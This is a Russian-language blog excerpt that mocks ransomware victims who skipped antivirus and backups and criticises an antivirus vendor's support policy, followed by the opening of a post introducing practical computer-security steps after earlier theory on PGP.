Итог — всех нищебродов за борт. Не купил антивирь заранее, сэкономил 200 рублей на болванки для бэкапа фоток, сэкономил на зарплате админу и серверах для бэкапа — вот сиди и набивай данные заново, нефиг флудить на форумах. И никого не ебёт, что завтра крайний срок сдачи годовой отчётности!

Видимо, поток жертв стал таким огромным, а разбор чужих конюшен настолько непродуктивным, что Паутинычи решили усилия своих квалифицированных спецов направить только на работу с теми, у кого шансов несколько больше — то есть у кого стоял их продукт ДО факта заражения. И я уверен, что объехать их будет трудно.

Ну и в завершение — немного юмористических рассказов, как использование виндовс снижает совокупную стоимость владения, особенно в домашнем секторе и малом / среднем бизнесе. На фоне выкупов в 20-50-100 биткойнов с компа очень прикольненько читать.

Здарова, люди!

Если вас сюда занесло неведомо какими потоками сетевого траффика, значит, ваш разум жаждет новых знаний, явно имеющих отношение к сетевой безопасности и связанной с ней паранойи.

Год назад я уже немного описал ключевые моменты, которые должны быть сделаны, если вы претендуете на то, чтобы ваш компьютер можно было назвать достаточно защищённым.

После года чтения теории (я надеюсь, вы теперь без проблем можете сказать собеседнику, где взять ваш открытый ключ PGP) предлагаю приступить к практике. Поехали.
(далее…)